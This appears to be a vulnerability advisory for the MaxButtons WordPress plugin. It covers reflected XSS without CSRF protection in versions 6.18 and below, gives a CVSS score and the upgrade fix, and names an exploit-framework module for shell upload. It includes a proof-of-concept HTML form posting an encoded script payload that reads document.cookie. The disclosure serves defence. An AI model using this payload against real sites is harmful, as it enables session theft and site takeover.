Homepage

https://wordpress.org/plugins/maxbuttons/

Overview

Due to a lack of CSRF mitigation and entity encoding in includes/admin_header.php, it is possible to execute scripts in the context of an admin user by including a script in the page field in a POST request.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

6.18 and below

Solution

Upgrade to version 6.19 or newer

WordPress Exploit Framework Module

exploit/xss/reflected/maxbuttons_reflected_xss_shell_upload

Proof of Concept

<form action="http://[target]/wp-admin/admin.php?page=maxbuttons-controller" method="post">
  <input name="page" type="text" value="&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&lt;div class=&quot;">
  <input type="submit" value="Submit">
</form>

WPVDB-ID

8831